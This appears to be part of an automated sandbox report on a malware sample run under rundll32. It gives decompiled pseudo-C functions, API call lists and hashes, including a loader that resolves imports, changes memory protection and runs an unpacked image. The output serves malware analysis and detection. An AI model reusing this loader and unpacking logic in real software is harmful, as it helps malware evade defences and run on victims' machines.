                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: ProtectVirtual$ErrorLast
                • String ID: @Met`fet MetTet
                • API String ID: 1469625949-3757152079
                • Opcode ID: 744d0af4141fe2b95fa11f896430a499ee11c5ca76440e274f46983cbb69f918
                • Instruction ID: f8590dcbed9c632339c19ca0b31eb8342a07c130e52ee45ae9f22e0d377e236d
                • Opcode Fuzzy Hash: 744d0af4141fe2b95fa11f896430a499ee11c5ca76440e274f46983cbb69f918
                • Instruction Fuzzy Hash: CD21627190020AEFCB18CF95C9859BAF7F4FF18345F01446AD202EB159E374A665CB58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B932F6 Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                Download Yara Rule
                APIs
                • SysAllocString.OLEAUT32(80000002), ref: 04B93353
                • SysAllocString.OLEAUT32(04B94515), ref: 04B93397
                • SysFreeString.OLEAUT32(00000000), ref: 04B933AB
                • SysFreeString.OLEAUT32(00000000), ref: 04B933B9
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: String$AllocFree
                • String ID:
                • API String ID: 344208780-0
                • Opcode ID: 9759be3d9bdae3da1c23f48534fa686f9d14ab0b5d34f143432dcfbf20ad4953
                • Instruction ID: 52d192db9cf70fd0c2cc652de088939f26f0c52108c25335f50a3370c7e5c9bd
                • Opcode Fuzzy Hash: 9759be3d9bdae3da1c23f48534fa686f9d14ab0b5d34f143432dcfbf20ad4953
                • Instruction Fuzzy Hash: B1310B71948209EFCF05CFA8D8C09AE7BF9FF48340B10946EE90697250DB35AD85CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B96599 Relevance: 6.0, APIs: 4, Instructions: 44sleepthreadtimeCOMMON
                Download Yara Rule
                C-Code - Quality: 65%
                			E04B96599(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t17;
				signed int _t18;
				unsigned int _t22;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t22 = _v12.dwHighDateTime;
					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t22 >> 5);
					_push(_t16);
					L04B984D6();
					_t34 = _t16 + _t13;
					_t17 = E04B96470(_a4, _t34);
					_t30 = _t17;
					_t18 = 3;
					Sleep(_t18 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}











                0x04b9659e
                0x04b965a9
                0x04b965aa
                0x04b965aa
                0x04b965b6
                0x04b965bf
                0x04b965c2
                0x04b965c6
                0x04b965c8
                0x04b965cd
                0x04b965ce
                0x04b965cf
                0x04b965d9
                0x04b965dc
                0x04b965e3
                0x04b965e7
                0x04b965ee
                0x04b965f4
                0x04b965fe

                APIs
                • SwitchToThread.KERNEL32(?,00000001,?,?,?,04B96921,?,?), ref: 04B965AA
                • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,04B96921,?,?), ref: 04B965B6
                • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 04B965CF
                  • Part of subcall function 04B96470: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 04B9650F
                • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,04B96921,?,?), ref: 04B965EE
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                • String ID:
                • API String ID: 1610602887-0
                • Opcode ID: 922570a4020924a2b20e92114d15a32092201de8e5bf0f4c941d4230e8f56df2
                • Instruction ID: eddb23ed5836fd1baf7083e1965e8460a0985900207de3ddaeae1afba0f5acb5
                • Opcode Fuzzy Hash: 922570a4020924a2b20e92114d15a32092201de8e5bf0f4c941d4230e8f56df2
                • Instruction Fuzzy Hash: E8F0A4B7A502087BDB149AA4CC1EBDF77B9DB84365F110165E601E7340E9B8AE0186A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401108 Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                Download Yara Rule
                C-Code - Quality: 87%
                			E00401108(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E00401C21(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







                0x00401111
                0x00401116
                0x00401124
                0x00401129
                0x00401129
                0x0040112f
                0x00401134
                0x00401138
                0x0040113c
                0x0040113c
                0x00401146
                0x0040114f

                APIs
                • GetCurrentThread.KERNEL32 ref: 0040110B
                • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 00401116
                • SetThreadPriority.KERNEL32(00000000,000000FF), ref: 00401129
                • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 0040113C
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: Thread$Priority$AffinityCurrentMask
                • String ID:
                • API String ID: 1452675757-0
                • Opcode ID: a514c98b64dad05162456f6bf13927b0d65a568c4b193775e3dc7ee30ab04a63
                • Instruction ID: 761571612bcd71f71f529ca26549820a74ebf55ca0307cbc8449af1630cff5f1
                • Opcode Fuzzy Hash: a514c98b64dad05162456f6bf13927b0d65a568c4b193775e3dc7ee30ab04a63
                • Instruction Fuzzy Hash: 68E092713063112BE2113F295C84E6B6B5CEF963317050236F620B62E4CB788D0595AD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BB1A65 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 160memoryCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773208004.0000000000BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_bb0000_rundll32.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID: X
                • API String ID: 544645111-3081909835
                • Opcode ID: d094a36c1d17c3c370052c8345119ec93922f320f2933c8fbd83f2a3a5e1a2fa
                • Instruction ID: 456bdc474b7e6b5a6bd17401423946863ec1f1ef5ea6baa890ce146db8263ea0
                • Opcode Fuzzy Hash: d094a36c1d17c3c370052c8345119ec93922f320f2933c8fbd83f2a3a5e1a2fa
                • Instruction Fuzzy Hash: CA81CBB4E002188FDB58CF99C890A9DFBF1FF48310F2585AAE948AB351D774A985CF50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B92F4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50memorytimeCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E04B92F4B(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				short _t19;
				void* _t21;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E04B92EAF(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0;
					_t22 = E04B91C12(__ecx, _a4, _a8, _t25);
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t21 = E04B92331(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8); // executed
						_t22 = _t21;
					}
					HeapFree( *0x4b9a2d8, 0, _t25);
				}
				return _t22;
			}











                0x04b92f4b
                0x04b92f5c
                0x04b92f60
                0x04b92fbb
                0x04b92f62
                0x04b92f69
                0x04b92f71
                0x04b92f79
                0x04b92f7d
                0x04b92f83
                0x04b92f8b
                0x04b92f8e
                0x04b92fa1
                0x04b92fa6
                0x04b92fa6
                0x04b92fb1
                0x04b92fb1
                0x04b92fc2

                APIs
                  • Part of subcall function 04B92EAF: lstrlen.KERNEL32(?,00000000,05109D00,00000000,04B977C5,05109F23,69B25F44,?,?,?,?,69B25F44,00000005,04B9A00C,4D283A53,?), ref: 04B92EB6
                  • Part of subcall function 04B92EAF: mbstowcs.NTDLL ref: 04B92EDF
                  • Part of subcall function 04B92EAF: memset.NTDLL ref: 04B92EF1
                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74655520,00000008,00000014,004F0053,051093CC), ref: 04B92F83
                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74655520,00000008,00000014,004F0053,051093CC), ref: 04B92FB1
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                • String ID: Uet
                • API String ID: 1500278894-2766386878
                • Opcode ID: 040b874adfb5905ca92df0c608542de55f0ec3e69136c848b917bef75bb11dd2
                • Instruction ID: 889771ff31f59b1aef5fe2917aba7848491409e0c486dedaa1412b3c4fd9b48b
                • Opcode Fuzzy Hash: 040b874adfb5905ca92df0c608542de55f0ec3e69136c848b917bef75bb11dd2
                • Instruction Fuzzy Hash: 2801B135600209BBEF216FA49C44F9F7BB8EF84704F00447AFA009B150EA71ED649760
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B91653 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                Download Yara Rule
                C-Code - Quality: 47%
                			E04B91653(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E04B96601(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x4b99278); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                0x04b91657
                0x04b91664
                0x04b91666
                0x04b91667
                0x04b9166f
                0x04b9166f
                0x04b91673
                0x00000000
                0x00000000
                0x04b9166a
                0x04b9166b
                0x04b9166e
                0x04b9166e
                0x04b9167b
                0x04b91680
                0x04b91685
                0x04b9168d
                0x04b91693
                0x04b91695
                0x04b91698
                0x04b9169c
                0x04b9169e
                0x04b916a1
                0x04b916a1
                0x04b916a2
                0x04b916a4
                0x04b916a1
                0x04b916ae
                0x04b916b1
                0x04b916b4
                0x04b916b5
                0x04b916b7
                0x04b916be
                0x04b916be
                0x04b916ca

                APIs
                • StrChrA.SHLWAPI(?,00000020,00000000,051095FC,?,?,04B97883,?,051095FC), ref: 04B9166F
                • StrTrimA.SHLWAPI(?,04B99278,00000002,?,04B97883,?,051095FC), ref: 04B9168D
                • StrChrA.SHLWAPI(?,00000020,?,04B97883,?,051095FC), ref: 04B91698
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Trim
                • String ID:
                • API String ID: 3043112668-0
                • Opcode ID: 90259851d819a404b9a0406ae73306c9002ca1d64d8a969decbf846b5b446548
                • Instruction ID: cce75a48902567899759fd21026f3f8d7a7efaf9675235c707931c015018e4da
                • Opcode Fuzzy Hash: 90259851d819a404b9a0406ae73306c9002ca1d64d8a969decbf846b5b446548
                • Instruction Fuzzy Hash: D2019A71B003566AFB204E2E8C54F637BCDEB8A340F0840B2AA41CB292DA70EC02D660
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BB1C01 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93memoryCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773208004.0000000000BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_bb0000_rundll32.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID: X
                • API String ID: 544645111-3081909835
                • Opcode ID: 632701b67340bb54fcd7d48c37394b6c63e9b253b34bd9e06e6797316f39803f
                • Instruction ID: 4cdb6703353aaa9dc21bc4ec037e210fbfc97c1e3b09db3d89f1cf903b0c4f0d
                • Opcode Fuzzy Hash: 632701b67340bb54fcd7d48c37394b6c63e9b253b34bd9e06e6797316f39803f
                • Instruction Fuzzy Hash: 64419DB5E006288FDB24CF18C980B98BBB1FF49310F5581A9C909AB352D371AD81CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B94130 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E04B94130(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x4b9a2d8, 0, _a4); // executed
				return _t2;
			}




                0x04b9413c
                0x04b94142

                APIs
                • RtlFreeHeap.NTDLL(00000000,00000000,04B9658A,00000000,?,00000000,00000000), ref: 04B9413C
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID: Uet
                • API String ID: 3298025750-2766386878
                • Opcode ID: 52b500f5288ff8b0756dafbf509c2ec9a5b3a6fa1adda6fb091a627d6ec16b77
                • Instruction ID: 5a1560fa630398bc4c5f8b40e7c85bc9bc60b3fe2323b0218a86f729394b4ad9
                • Opcode Fuzzy Hash: 52b500f5288ff8b0756dafbf509c2ec9a5b3a6fa1adda6fb091a627d6ec16b77
                • Instruction Fuzzy Hash: 63B012B1200200BBCF214B10DF04F057A21E758700F008016B304010708A360C20FB35
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B92DB2 Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E04B92DB2(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E04B932F6(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x4b9a348; // 0x56d5a8
						_t20 = _t68 + 0x4b9b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E04B971DF(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                0x04b92db8
                0x04b92dbb
                0x04b92dcb
                0x04b92dd4
                0x04b92dd8
                0x04b92ea6
                0x04b92eac
                0x04b92eac
                0x04b92df2
                0x04b92df7
                0x04b92dfb
                0x04b92e01
                0x04b92e06
                0x04b92e0d
                0x04b92e1c
                0x04b92e1c
                0x04b92e20
                0x04b92e22
                0x04b92e2e
                0x04b92e39
                0x04b92e44
                0x04b92e48
                0x04b92e52
                0x04b92e56
                0x04b92e58
                0x04b92e5d
                0x04b92e64
                0x04b92e74
                0x04b92e74
                0x04b92e5d
                0x04b92e56
                0x04b92e76
                0x04b92e7b
                0x04b92e80
                0x04b92e80
                0x04b92e83
                0x04b92e8c
                0x04b92e91
                0x04b92e91
                0x04b92e96
                0x04b92e9b
                0x04b92e9b
                0x04b92e96
                0x04b92e20
                0x04b92e9d
                0x04b92ea3
                0x00000000

                APIs
                  • Part of subcall function 04B932F6: SysAllocString.OLEAUT32(80000002), ref: 04B93353
                  • Part of subcall function 04B932F6: SysFreeString.OLEAUT32(00000000), ref: 04B933B9
                • SysFreeString.OLEAUT32(?), ref: 04B92E91
                • SysFreeString.OLEAUT32(04B94515), ref: 04B92E9B
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: String$Free$Alloc
                • String ID:
                • API String ID: 986138563-0
                • Opcode ID: 737dc48d5e8d05a986a9a00e4bac3872f22c9eddc2adc6d23e5e715e230d8633
                • Instruction ID: 498afc49f8ee7884d3230f306a26500745be5c389bbaf27c730da9c13714a823
                • Opcode Fuzzy Hash: 737dc48d5e8d05a986a9a00e4bac3872f22c9eddc2adc6d23e5e715e230d8633
                • Instruction Fuzzy Hash: 31315A75900519FFCF15EF54C888C9BBBB9FBC97407148AA8F8159B220E631AD51CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401925 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70COMMON
                Download Yara Rule
                C-Code - Quality: 85%
                			E00401925(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x4041c0;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x4041c0 - 0x69b24f45 &  !( *0x4041c0 - 0x69b24f45);
				_t18 = E00401AA8( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x4041c0 - 0x69b24f45 &  !( *0x4041c0 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x4041c0 - 0x69b24f45 &  !( *0x4041c0 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E004019C9(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t29 = E00401385(_t40, _t44);
						if(_t29 == 0) {
							_t26 = E00401152(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E00401B8C(_t42);
					L8:
					return _t29;
				}
			}













                0x0040192d
                0x0040192f
                0x0040194b
                0x0040195c
                0x00401963
                0x004019c1
                0x00000000
                0x00401965
                0x00401965
                0x0040196f
                0x00401973
                0x00401978
                0x00401980
                0x00401984
                0x00401989
                0x0040198e
                0x00401992
                0x00401997
                0x00401998
                0x0040199c
                0x004019a1
                0x004019a9
                0x004019a9
                0x004019a1
                0x00401992
                0x00401984
                0x004019ab
                0x004019b4
                0x004019b8
                0x004019c2
                0x004019c8
                0x004019c8

                APIs
                  • Part of subcall function 00401AA8: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401961,?,?,?,?,?,00000002,?,?), ref: 00401ACC
                  • Part of subcall function 00401AA8: GetProcAddress.KERNEL32(00000000,?), ref: 00401AEE
                  • Part of subcall function 00401AA8: GetProcAddress.KERNEL32(00000000,?), ref: 00401B04
                  • Part of subcall function 00401AA8: GetProcAddress.KERNEL32(00000000,?), ref: 00401B1A
                  • Part of subcall function 00401AA8: GetProcAddress.KERNEL32(00000000,?), ref: 00401B30
                  • Part of subcall function 00401AA8: GetProcAddress.KERNEL32(00000000,?), ref: 00401B46
                  • Part of subcall function 00401385: LoadLibraryA.KERNEL32 ref: 004013BD
                  • Part of subcall function 00401152: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 0040118B
                  • Part of subcall function 00401152: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00401200
                  • Part of subcall function 00401152: GetLastError.KERNEL32 ref: 00401206
                • GetLastError.KERNEL32(?,?), ref: 004019A3
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
                • String ID: @Met`fet MetTet
                • API String ID: 3135819546-3757152079
                • Opcode ID: 1046f364fa201fed147f0656f1e095bc89a0743ce042f68b32fc3e67f1d2f891
                • Instruction ID: 72f375baed0aad7469d874c0145223312decf7d168196047134e353b5cd8a30c
                • Opcode Fuzzy Hash: 1046f364fa201fed147f0656f1e095bc89a0743ce042f68b32fc3e67f1d2f891
                • Instruction Fuzzy Hash: 70110BB6600701ABD721ABA68C90DAB77BCAF88314700453BEA42B7651DA78ED0587D5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401490 Relevance: 3.1, APIs: 2, Instructions: 60stringthreadCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401490() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				void* _t24;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x4041c4;
				if( *0x4041ac > 5) {
					_t16 = _t15 + 0x4050f9;
				} else {
					_t16 = _t15 + 0x4050b1;
				}
				E00401000(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				_t24 = E004017DC( &_v32,  &_v16,  *0x4041c0 ^ 0xf7a71548); // executed
				if(_t24 == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x4041b8);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E00402133(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t40 =  *0x4041b8;
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x4041b8 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E00402205(_t45, _t40, _t32 + 4);
						}
					}
					_t25 = E00401925(_v28); // executed
				}
				ExitThread(_t25);
			}
















                0x00401496
                0x004014a7
                0x004014b1
                0x004014a9
                0x004014a9
                0x004014a9
                0x004014b8
                0x004014c1
                0x004014c6
                0x004014dd
                0x004014e4
                0x00401541
                0x004014e6
                0x004014ec
                0x004014f2
                0x00401500
                0x00401504
                0x0040150b
                0x0040150d
                0x00401513
                0x00401517
                0x0040151f
                0x00401530
                0x00401521
                0x00401527
                0x00401527
                0x0040151f
                0x00401538
                0x00401538
                0x00401543

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
